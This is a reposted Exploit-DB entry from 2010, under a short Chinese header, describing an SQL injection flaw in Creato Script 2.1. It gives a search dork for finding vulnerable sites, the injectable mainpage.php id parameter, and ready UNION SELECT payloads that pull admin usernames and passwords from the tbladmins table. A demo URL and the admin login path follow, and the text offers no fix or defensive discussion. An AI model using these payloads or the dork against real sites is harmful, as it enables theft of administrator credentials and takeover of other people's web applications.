Creato Script – SQL Injection - 体验盒子

作者： Mr.P3rfekT

日期： 2010-05-30

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12807/

# Title:Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site:http://www.creato.biz 
# Tested on Lunix
# CVE : N/A
 
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "


# Helllo Allz.
 
 
# Exploit :
 
http://[site]/mainpage.php?id={SQLi}



# Poc Username:

union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Poc Password:

# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--


# Demo:

 http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
 
# Admin Login


# http://[site]/admun/login.php

# ./done.

 
####################################################################
 
MaiL :R4p@hotmail.com

Greeetz To : Sinaritx,HcJ,Mr.Black,D3ViL H4CK3R,Uzm4n,Nani17,Cyb3r-DeViL,www.v4-team.com,www.arab-exploit.com Cr3w,www.Barcelonasy.com & All Who Known Me

 
###############################################